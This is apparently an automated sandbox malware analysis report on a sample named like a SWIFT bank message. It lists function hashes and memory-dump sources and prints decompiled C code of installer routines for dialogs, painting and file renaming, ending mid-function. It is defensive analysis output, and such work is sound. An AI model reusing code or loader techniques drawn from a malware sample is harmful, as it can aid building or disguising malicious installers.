Opcode Fuzzy Hash: 4961dadb1dca141c20613297683d6af8f1867afb12d6a402e0ff6f1dfd6e6b1a
Instruction Fuzzy Hash: 84914A71204359CFDF348E788EA93DA37B6AF997A4F85412ECC9AAF155E7344A41CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6B3F Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3090748ff76b6db9e6407dc7789d484282cebe01a4c4ca4b9f4ab5c6515ad7dc
Instruction ID: c103d5b8e8b120e40922559661426021e4fad257b4fd4678f429ce636da63238
Opcode Fuzzy Hash: 3090748ff76b6db9e6407dc7789d484282cebe01a4c4ca4b9f4ab5c6515ad7dc
Instruction Fuzzy Hash: D6916B71204349CFDF348E788EA93DA37B6AF99794F85412ECC9AAF155E7304A42CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02AF6E04 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 679af79a33b5c9ed914836ffdc625aea19b3d8c9282a07b79ee1e373baa3b830
Instruction ID: e14e33a17a306b6b767151232f293773511943d753526bdecef9d73dfbec7900
Opcode Fuzzy Hash: 679af79a33b5c9ed914836ffdc625aea19b3d8c9282a07b79ee1e373baa3b830
Instruction Fuzzy Hash: 14815971104349CBDF748EB88EB93DA37A6AF59790F95422ECD9D9F181E7354A82CB00

Uniqueness

Uniqueness Score: -1.00%

Function 02AF211E Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3999e6693fee25ec64f20a9a7fad5a9cb6526507e6576e83fecdbb3e3da781b6
Instruction ID: fdff5ab01c09d9d75f7a5f7beba861834e5c0358206566704fff2433d5d350ea
Opcode Fuzzy Hash: 3999e6693fee25ec64f20a9a7fad5a9cb6526507e6576e83fecdbb3e3da781b6
Instruction Fuzzy Hash: 0B514730600346DFDF285E6885B97FB23AA9F15298FD4856FDD8787184DB2684C5CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AF757E Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b675cfae110de0484bd4fc06bf1710ea2ba184435808b05a40d0ae9664f18cb
Instruction ID: 18ad8abf92c6589ca139806e17a03707f66ec64a345b93322eb8b72b434f55c0
Opcode Fuzzy Hash: 8b675cfae110de0484bd4fc06bf1710ea2ba184435808b05a40d0ae9664f18cb
Instruction Fuzzy Hash: 3B8130316053588FEF285E3889953EFBBB7AF856A4F86481DDCCAA7108D3304995CB46

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2140 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 725edf3b8e10c216765d6db33415cd6b7f2e47d3c0b5b36ab2a9b94de21769e4
Instruction ID: bd39743429807a370d7255eee2d31733445230c6f91b50962922f41f623e6a32
Opcode Fuzzy Hash: 725edf3b8e10c216765d6db33415cd6b7f2e47d3c0b5b36ab2a9b94de21769e4
Instruction Fuzzy Hash: 27513730600346DFDF286E6889B97EB23AADF55298FD4816FDD9787194DB3684C1CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AF7A75 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2906bbe66978e593f69979f794b245bb42478a24dd4b6a99060c65acf55cc7e0
Instruction ID: e2804f0647bca728862c6d18b1d54cd2acc191a9cc18586c3751406f7e9fdae3
Opcode Fuzzy Hash: 2906bbe66978e593f69979f794b245bb42478a24dd4b6a99060c65acf55cc7e0
Instruction Fuzzy Hash: 9F610475644349DFCF346E28CDA9BDB3767AF66780FC54419DCCA8B204E735898A8B02

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2187 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b91bf1f80ad2593b387599231645392a8fee438facc3673a1e26d491e6c2b458
Instruction ID: dfe26adcf4a83621cb21e37019c84630fb0f30e8b1a6b0f54eac7dcded67b9f0
Opcode Fuzzy Hash: b91bf1f80ad2593b387599231645392a8fee438facc3673a1e26d491e6c2b458
Instruction Fuzzy Hash: 2F517931601346CFEF285F3845B93EA336A9F556A8BD449AFCCC797159E7218485CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0A53 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fca52ce3e599f7d3674ae247efe9a106ae72f5237bf2d0edf5aaff414a74f66
Instruction ID: 423922c1c42508e846fec611ae6687f753157096a7359716cf9e515b4e72726d
Opcode Fuzzy Hash: 6fca52ce3e599f7d3674ae247efe9a106ae72f5237bf2d0edf5aaff414a74f66
Instruction Fuzzy Hash: 7F318B21E5E305C8F7E220F489503B261A78F12211E924727BFAB528DA7E4D49CAC5CA

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0938 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 728d96f7fad0564cfe47af84d57439732899b35f93265c7612df199ad20df58b
Instruction ID: 28d377427aa71e8174ced57323244b281577483538a05ada7d5c4fdcea0e4d4b
Opcode Fuzzy Hash: 728d96f7fad0564cfe47af84d57439732899b35f93265c7612df199ad20df58b
Instruction Fuzzy Hash: 3E318F22E2E305CCF7D120F489503B261A68F02301E524723BF6F524DA3E5E45C9C18A

Uniqueness

Uniqueness Score: -1.00%

Function 02AF700F Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba29f4dd8e93918ff6bd7becaada91a6d40b0c572a7eea8dec9225b05231a0a0
Instruction ID: 982f257537d43049fb390a34a4a035048c31d0ef8b2f397e9941630b7a6776d1
Opcode Fuzzy Hash: ba29f4dd8e93918ff6bd7becaada91a6d40b0c572a7eea8dec9225b05231a0a0
Instruction Fuzzy Hash: 715138716403499FCF308E689CD8BDB37B7EF96790F95412AEC889B244D731498ACB11

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2202 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f78ee13628484bd3b24fc6ce7c752534f2e12a1d1494caf851ba2b68de6fd934
Instruction ID: 7b8519dfe31ba2745b88f02c40f306f35610b5b6b81bc434a6a4e80056089351
Opcode Fuzzy Hash: f78ee13628484bd3b24fc6ce7c752534f2e12a1d1494caf851ba2b68de6fd934
Instruction Fuzzy Hash: 9F516830600306DFDF285E2485B97EB236ADF15294BD5816FCC97CB194EB22C8C1CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AF08C2 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8774fd72adf51e96cc7cb7bba2710ec817fc55806688a9204db6fa67a473f8d
Instruction ID: f082f06d328b9e900989794245676e20d9bf632567d6819a925fb4459043c125
Opcode Fuzzy Hash: d8774fd72adf51e96cc7cb7bba2710ec817fc55806688a9204db6fa67a473f8d
Instruction Fuzzy Hash: 0D418C22E5E315CCF7D220F489503B265668F12301E928727BF6B525DB7E5D098EC2CA

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0A0F Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eec4c126022fdbde734af6218395a23744fbc2fd35e53744f9af3e450ab98a7
Instruction ID: dfc5cfec5791a557f4e6ef2dafcd4b0f0e75eafab5cb946b0273c0ecd52f53bb
Opcode Fuzzy Hash: 3eec4c126022fdbde734af6218395a23744fbc2fd35e53744f9af3e450ab98a7
Instruction Fuzzy Hash: 5D319D21E5E305CDF7D220F485503B261678F02311E924727BFAB528DA7E5D09CAC5CA

Uniqueness

Uniqueness Score: -1.00%

Function 02B1210E Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddcd7752305cee13b565cc590abe0356a2a0cc79b78dab47cb38116c6a68d642
Instruction ID: a451e3bad327e2fcf245b638be2faaf21d0c5de21b2159fc14ff9963bf194057
Opcode Fuzzy Hash: ddcd7752305cee13b565cc590abe0356a2a0cc79b78dab47cb38116c6a68d642
Instruction Fuzzy Hash: EA4138357403168FDB289D2886F57DB33A3AF96290FC5817ECD8A8F205D7315885C601

Uniqueness

Uniqueness Score: -1.00%

Function 02AF0A0C Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932b19321348ccb712e03318db9efae1b2973dc16426c3a51df49a87e89ffe8b
Instruction ID: 920f39ee437f672b24d109c169460debbc1af8e5d31f2c34d9c5af62133afe3f
Opcode Fuzzy Hash: 932b19321348ccb712e03318db9efae1b2973dc16426c3a51df49a87e89ffe8b
Instruction Fuzzy Hash: B5318F21E6E305CCF7E220F485503B251678F12351E9247277F6F528DA7E4D49C9C1CA

Uniqueness

Uniqueness Score: -1.00%

Function 02B11118 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55ea9690cdcd95a8c3229461c67402ff4836e188a3a559e981f3aeddb6b7247
Instruction ID: 97c880352fc79569c0d77105c738f595f5b3fe78b579e481dd05723ef1dbf889
Opcode Fuzzy Hash: a55ea9690cdcd95a8c3229461c67402ff4836e188a3a559e981f3aeddb6b7247
Instruction Fuzzy Hash: 37B01238225640CFC79ACF0CC090F90B3B4FB04A00FC108C0E8118BB15C328EC80CD50

Uniqueness

Uniqueness Score: -1.00%

Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004043B4(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b214 =  *0x42b214 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040427E(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432e80;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404663(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434ee8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434ee8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b214 != 0) {
						goto L27;
					} else {
						_t116 =  *0x42c220 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404239(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040463F();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433ebc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404365;
				if(_t110 != 2) {
					_v8 = E0040432B;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404217(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404217(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404239( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040424C(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434ef4 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b214 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b214 = 0;
				return 0;
			}

0x004043c6
0x004044f3
0x00404550
0x00404554
0x00404621
0x00404623
0x00404623
0x00404629
0x00404629
0x0040462c
0x00000000
0x00404633
0x00404562
0x00404568
0x00404572
0x0040457d
0x00404580
0x00404583
0x0040458e
0x00404591
0x00404598
0x004045a5
0x004045b6
0x004045bc
0x004045c4
0x004045d2
0x004045d8
0x004045d8
0x00404598
0x004045e2
0x00000000
0x004045ed
0x004045f1
0x00404601
0x00404601
0x00404607
0x00404613
0x00404613
0x00000000
0x00404617
0x004045e2
0x004044fe
0x00000000
0x00404510
0x00404515
0x0040451b
0x00000000
0x00000000
0x00404544
0x00404546
0x0040454b
0x00000000
0x0040454b
0x004044fe
0x004043cc
0x004043cf
0x004043d4
0x004043e5
0x004043e5
0x004043ed
0x004043f0
0x004043f4
0x004043f7
0x004043fb
0x004043fe
0x00404401
0x00404404
0x0040440b
0x0040440d
0x0040440d
0x00404417
0x00404424
0x0040442e
0x00404433
0x00404436
0x0040443b
0x00404452
0x00404459
0x0040446c
0x0040446f
0x00404483
0x0040448a
0x0040448f
0x00404494
0x00404494
0x004044a2
0x004044b0
0x004044c2
0x004044c7
0x004044d7
0x004044d9
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
GetDlgItem.USER32(?,000003E8), ref: 00404466
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
GetSysColor.USER32(?), ref: 00404494
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
lstrlenW.KERNEL32(?), ref: 004044B5
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
GetDlgItem.USER32(?,0000040A), ref: 00404530
SendMessageW.USER32(00000000), ref: 00404537
GetDlgItem.USER32(?,000003E8), ref: 00404562
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
SetCursor.USER32(00000000), ref: 004045B6
LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
SetCursor.USER32(00000000), ref: 004045D2
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613

Strings

Call, xrefs: 00404591
+C@, xrefs: 004045BE
N, xrefs: 00404550

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: +C@$Call$N
API String ID: 3103080414-3697844480
Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434ef4;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433ee0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434ee8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405ECE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x4308e8 = 0x55004e;
				 *0x4308ec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4310e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4304e8, "%ls=%ls\r\n", 0x4308e8, 0x4310e8);
						_t53 = _t52 + 0x10;
						E004062A4(_t37, 0x400, 0x4310e8, 0x4310e8,  *((intOrPtr*)( *0x434ef4 + 0x128)));
						_t12 = E00405D74(0x4310e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DF7(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CD9(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CD9(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D2F(_t24 + _t46, 0x4304e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E26(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
